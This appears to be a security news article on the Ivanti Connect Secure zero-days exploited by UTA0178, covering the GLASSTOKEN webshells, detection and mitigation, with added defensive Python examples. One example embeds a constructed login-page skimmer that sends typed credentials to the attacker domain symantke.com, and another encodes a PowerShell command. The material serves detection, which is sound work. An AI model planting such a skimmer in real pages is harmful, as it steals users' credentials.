Ivanti Secure VPN zero-day vulnerabilities allow Chinese threat actor to compromise systems


Two zero-day vulnerabilities have been discovered in Ivanti Connect Secure VPN, a popular VPN solution used by organizations around the world. The vulnerabilities are being exploited in the wild by at least one threat actor, tracked as UTA0178, that Volexity assesses to be a Chinese nation-state actor. Chained together, the two vulnerabilities allow an attacker to execute code remotely without any authentication and fully compromise the affected systems.

What are Ivanti Secure VPN zero-day vulnerabilities?

Ivanti published an official security advisory and a knowledge base article on two zero-day vulnerabilities, CVE-2023-46805 and CVE-2024-21887, affecting all supported versions of Ivanti Connect Secure (formerly known as Pulse Connect Secure) and Ivanti Policy Secure gateways.

  • CVE-2023-46805 is an authentication bypass vulnerability in the web component of Ivanti Connect Secure and Ivanti Policy Secure. It allows a remote attacker to access restricted resources by bypassing control checks.
  • CVE-2024-21887 is a command injection vulnerability in the web components of Ivanti Connect Secure and Ivanti Policy Secure. It allows an authenticated administrator to send specially crafted requests and execute arbitrary commands on the device, and it can be exploited over the Internet.

When chained, these two vulnerabilities allow an unauthenticated attacker to execute arbitrary commands on affected devices.

Patrice Auffret, founder, CEO and CTO of ONYPHE, a French cyber defense search engine dedicated to the discovery and management of attack surfaces, told TechRepublic in an email interview today that 29,664 Ivanti Secure VPN devices are exposed on the Internet, with over 40% of the exposed systems located in the US, followed by Japan (14.3%) and Germany (8.48%) (Figure A).

Figure A

Unique Ivanti Secure VPN IP addresses on the Internet. Image: ONYPHE

Exploiting these zero-day vulnerabilities in the wild

American cybersecurity company Volexity discovered both vulnerabilities during an incident response investigation covering multiple systems. The investigation revealed that a threat actor had modified several files on the Ivanti Connect Secure VPN device (Figure B).

Figure B

Modified files on a compromised Ivanti Secure VPN device. Image: Volexity

Volexity also believes that several files were created and executed in the system's temporary folder (/tmp) but were no longer available for analysis at the time of the incident response, among them:

  • /tmp/rev
  • /tmp/s.py
  • /tmp/s.jar
  • /tmp/b
  • /tmp/kill

A copy of PySoxy, a freely available Python SOCKS5 proxy script, was recovered from a disk image and is believed to be the s.py file.

The threat actor, named UTA0178 by Volexity, deployed webshells and modified files to enable credential theft, then moved laterally from one system to another using the compromised credentials. It harvested further credentials on each system it accessed and was observed dumping a complete image of the Active Directory database. Finally, the attacker modified the JavaScript loaded by the VPN device's web login page so that any credentials entered were captured: the legitimate lastauthserverused.js script was altered to send the stolen credentials to an attacker-controlled domain, symantke(.)com.

Once in possession of the credentials, the threat actor scanned the network, examined user files and configuration files, and deployed more webshells across the network, including a custom webshell that Volexity calls GLASSTOKEN.
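One practical check the tampering described above suggests is to compare the login-page script served by the appliance against a known-good baseline and to list every external host it references. The following is an added example, not Volexity's or Ivanti's code: the two JavaScript snippets are constructed stand-ins for a clean and a tampered lastauthserverused.js (the real script's contents are not reproduced here), and the expected hostname vpn.example.com is an assumption standing in for your own appliance's name.

```python
import hashlib
import re
from typing import Dict, List, Set

# Constructed stand-in for the login-page script; NOT the real lastauthserverused.js.
CLEAN_JS = """
function rememberAuthServer(name) {
  document.cookie = "lastauthserver=" + encodeURIComponent(name) + "; path=/";
}
"""

# Constructed tampered variant: the same script with an appended block that ships the
# submitted password to a host the appliance has no business talking to.
TAMPERED_JS = CLEAN_JS + """
(function () {
  var f = document.getElementById("frmLogin");
  if (!f) { return; }
  f.addEventListener("submit", function () {
    new Image().src = "https://symantke.com/c?u=" + encodeURIComponent(f.username.value)
                    + "&p=" + encodeURIComponent(f.password.value);
  });
})();
"""

URL_HOST = re.compile(r"https?://([A-Za-z0-9.-]+)")
EXPECTED_HOSTS: Set[str] = {"vpn.example.com"}   # assumption: your own appliance hostname(s)


def sha256_hex(js: str) -> str:
    """Content hash used as the baseline for the served script."""
    return hashlib.sha256(js.encode("utf-8")).hexdigest()


def external_hosts(js: str) -> List[str]:
    """Hostnames referenced by absolute URLs in the script, minus the ones we expect."""
    return sorted({h.lower() for h in URL_HOST.findall(js)} - EXPECTED_HOSTS)


def check_script(js: str, baseline_hash: str) -> Dict[str, object]:
    """Compare a freshly fetched script against the baseline and summarise what changed."""
    return {
        "hash_matches": sha256_hex(js) == baseline_hash,
        "unexpected_hosts": external_hosts(js),
        # A login helper that reads the password field is itself worth a look.
        "reads_password": bool(re.search(r"\.password\b", js)),
    }


if __name__ == "__main__":
    baseline = sha256_hex(CLEAN_JS)
    print("clean:   ", check_script(CLEAN_JS, baseline))
    print("tampered:", check_script(TAMPERED_JS, baseline))
```

Record the baseline hash from a device you trust (or from a fresh vendor image) before an incident, not after; a hash taken from an already compromised appliance only baselines the attacker's version.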

Custom GLASSTOKEN webshell

While the threat actor used several public, well-known tools, it also deployed GLASSTOKEN, in two slightly different versions.

The first version includes two code paths, selected by the parameters provided in the request. The first path is used to relay a connection, while the second is used to execute code that is hex-decoded and then base64-decoded. According to Volexity's observations, the threat actor primarily used it to execute PowerShell commands.

The second version of the webshell is similar to the first, except that it lacks the proxy function and only allows code execution.

Volexity has provided the complete code for those webshells.
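The hex-then-base64 decoding chain described above is also a useful triage handle: a request parameter that hex-decodes and then base64-decodes to readable command text is worth a closer look. The block below is an added example, not Volexity's code and not the webshell itself. It encodes a command the way the text says the webshell expects, decodes it the same way, and applies the reverse as a heuristic over captured parameter values. The sample values, the keyword list and the idea of triaging by parameter value are assumptions for this example; GLASSTOKEN's actual parameter names are not reproduced here.

```python
import base64
import binascii
import string
from typing import Dict, List, Optional


def hex_b64_encode(command: str) -> str:
    """Produce the encoding the article describes: base64 first, then the base64 text
    is hex-encoded, so the receiver hex-decodes first and base64-decodes second."""
    return base64.b64encode(command.encode("utf-8")).hex()


def hex_b64_decode(value: str) -> Optional[str]:
    """Reverse the chain (hex, then base64). Returns None if either stage is invalid."""
    try:
        raw = bytes.fromhex(value.strip())
        decoded = base64.b64decode(raw, validate=True)
        return decoded.decode("utf-8")
    except (ValueError, binascii.Error, UnicodeDecodeError):
        return None


# Substrings that, in a decoded parameter, justify a human look. Assumed list for this example.
SUSPICIOUS_TOKENS = ("powershell", "cmd.exe", "whoami", "net user", "invoke-", "iex", "-enc", "ntds")


def classify_parameter(value: str) -> Dict[str, object]:
    """Triage one captured parameter value: does it decode, and does the result look like a command?"""
    decoded = hex_b64_decode(value)
    if decoded is None:
        return {"decodes": False, "suspicious": False, "command": None}
    printable = all(ch in string.printable for ch in decoded)
    suspicious = printable and any(tok in decoded.lower() for tok in SUSPICIOUS_TOKENS)
    return {"decodes": True, "suspicious": suspicious, "command": decoded if printable else None}


# Constructed sample: two benign-looking values and one command encoded as described.
SAMPLE_VALUES: List[str] = [
    "search=ivanti",                          # not hex at all
    "deadbeef",                               # valid hex, but not valid base64 underneath
    hex_b64_encode("powershell -c whoami"),   # what an operator-issued command would look like
]


def triage(values: List[str] = SAMPLE_VALUES) -> List[str]:
    """Return the decoded commands of every value that triages as suspicious."""
    return [str(r["command"]) for r in map(classify_parameter, values) if r["suspicious"]]


if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        print(v[:40], "->", classify_parameter(v))
    print("suspicious commands:", triage())
```

Run it over parameter values pulled from the appliance's web logs or from a packet capture of traffic to the device; values that decode cleanly to printable text are rare in legitimate traffic and cheap to review by hand.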

Threat detection

Network traffic analysis

Careful analysis of outgoing traffic from the VPN device can reveal suspicious activity. Aside from the legitimate connection to pulsesecure.net and any other configured customer-related integrations (SSO, MFA, etc.), any other outbound activity should be analyzed. Examples observed by Volexity are curl requests to remote websites, SSH connections to remote IP addresses, and encrypted communications to hosts that are not associated with the vendor or with device updates.

Traffic arriving on the internal network from the IP addresses associated with the VPN device should also be checked carefully. Suspicious activity on such connections includes RDP or SMB activity toward internal systems, SSH connection attempts and port scanning, to name a few.

VPN device log analysis

Any indication that the VPN device's log files have been deleted or that logging has been disabled is a strong indicator of compromise, provided logging was previously active.

Requests for files in atypical paths in the logs should also be treated as concerning and analyzed, as threat actors may store or manipulate files outside the usual folders.
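The four checks described in the two sections above (unexpected outbound destinations, lateral RDP/SMB/SSH traffic originating from the appliance, gaps that suggest logging was disabled, and requests for files in atypical paths) can be expressed as simple rules over exported logs. The following is an added example, not Volexity's or Ivanti's tooling: the log line formats are constructed for this example and are not Ivanti's real log format, and the appliance IP, the allowed path prefixes and the allowed destination hosts are assumptions you would replace with your own values.

```python
import re
from datetime import datetime, timedelta
from typing import List, Tuple

# Constructed sample records for this example (not real Ivanti log output).
WEB_LOG = """\
2024-01-11T09:00:01Z GET /dana-na/auth/url_default/welcome.cgi src=198.51.100.7
2024-01-11T09:00:05Z POST /dana-na/auth/url_default/login.cgi src=198.51.100.7
2024-01-11T09:00:12Z GET /tmp/s.py src=192.0.2.44
2024-01-11T13:30:00Z GET /dana-na/auth/url_default/welcome.cgi src=198.51.100.9
"""
OUTBOUND_LOG = """\
2024-01-11T09:01:00Z proto=tcp dst=pulsesecure.net:443
2024-01-11T09:01:30Z proto=tcp dst=sso.example.com:443
2024-01-11T09:02:00Z proto=tcp dst=symantke.com:443
2024-01-11T09:02:10Z proto=tcp dst=192.0.2.44:22
"""
FLOW_LOG = """\
src=10.0.0.5 dst=10.0.1.20 dport=445
src=10.0.0.5 dst=10.0.1.21 dport=3389
src=10.0.0.5 dst=10.0.1.22 dport=443
src=10.0.2.9 dst=10.0.1.20 dport=445
"""

APPLIANCE_IP = "10.0.0.5"                                       # assumed internal IP of the VPN device
ALLOWED_PATH_PREFIXES = ("/dana-na/", "/dana/")                 # assumed known-good web paths
ALLOWED_DST_HOSTS = ("pulsesecure.net", "sso.example.com")      # vendor plus configured integrations
LATERAL_PORTS = {22, 445, 3389}                                 # SSH, SMB, RDP
TS_FMT = "%Y-%m-%dT%H:%M:%SZ"


def _ts(line: str) -> datetime:
    return datetime.strptime(line.split(" ", 1)[0], TS_FMT)


def _allowed_host(host: str) -> bool:
    # Exact match or a subdomain; a plain suffix test would also accept "evilpulsesecure.net".
    return any(host == h or host.endswith("." + h) for h in ALLOWED_DST_HOSTS)


def find_atypical_paths(log: str = WEB_LOG) -> List[str]:
    """Requested paths outside the known-good prefixes, or containing directory traversal."""
    hits = []
    for line in log.splitlines():
        m = re.search(r"\s(?:GET|POST|PUT|DELETE)\s(\S+)", line)
        if m and ("/../" in m.group(1) or not m.group(1).startswith(ALLOWED_PATH_PREFIXES)):
            hits.append(m.group(1))
    return hits


def find_unexpected_outbound(log: str = OUTBOUND_LOG) -> List[str]:
    """Outbound destinations that are neither the vendor nor a configured integration."""
    hits = []
    for line in log.splitlines():
        m = re.search(r"dst=([^:\s]+):(\d+)", line)
        if m and not _allowed_host(m.group(1)):
            hits.append(f"{m.group(1)}:{m.group(2)}")
    return hits


def find_lateral_from_appliance(log: str = FLOW_LOG) -> List[str]:
    """Internal SMB/RDP/SSH connections whose source is the VPN device itself."""
    hits = []
    for line in log.splitlines():
        m = re.search(r"src=(\S+)\s+dst=(\S+)\s+dport=(\d+)", line)
        if m and m.group(1) == APPLIANCE_IP and int(m.group(3)) in LATERAL_PORTS:
            hits.append(f"{m.group(2)}:{m.group(3)}")
    return hits


def find_log_gaps(log: str = WEB_LOG, max_gap: timedelta = timedelta(hours=1)) -> List[Tuple[str, str]]:
    """Silent stretches longer than max_gap; on a normally busy device these suggest
    logging was disabled or entries were deleted, and deserve a look on their own."""
    stamps = [_ts(l) for l in log.splitlines() if l.strip()]
    return [(a.strftime(TS_FMT), b.strftime(TS_FMT))
            for a, b in zip(stamps, stamps[1:]) if b - a > max_gap]


if __name__ == "__main__":
    print("atypical paths:        ", find_atypical_paths())
    print("unexpected outbound:   ", find_unexpected_outbound())
    print("lateral from appliance:", find_lateral_from_appliance())
    print("log gaps:              ", find_log_gaps())
```

Tune the allowlists to the device's real configuration before trusting the output: every SSO, MFA, syslog or update endpoint the appliance legitimately talks to belongs in ALLOWED_DST_HOSTS, otherwise the outbound rule will drown real findings in noise.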

Integrity verification tool

The in-built Integrity Checker Tool can be configured to run automatically and detect new or mismatched files. As the Volexity researchers wrote, “if any new or mismatched files appear, the device should be considered compromised.”

Ivanti also provides an external version of the Integrity Checker Tool, which should be used when a system is suspected of being compromised. The tool should only be installed and run after all forensic evidence has been collected from the system, in particular a memory image, because running the tool reboots the device and may overwrite evidence.

Threat mitigation

Ivanti provides a mitigation method until a full patch is available. Ivanti notes that “patches will be released on a staggered schedule with the first version expected to be available to customers the week of January 22 and the final version expected the week of February 19.”

The mitigation consists of importing the mitigation.release.20240107.1.xml file through Ivanti's download portal. Depending on the configuration, this operation could degrade some functionality, as indicated on the dedicated Ivanti page. It is highly recommended to follow all of Ivanti's instructions carefully and to verify that the mitigation is working correctly.

Disclosure: I work for Trend Micro, but the opinions expressed in this article are my own.
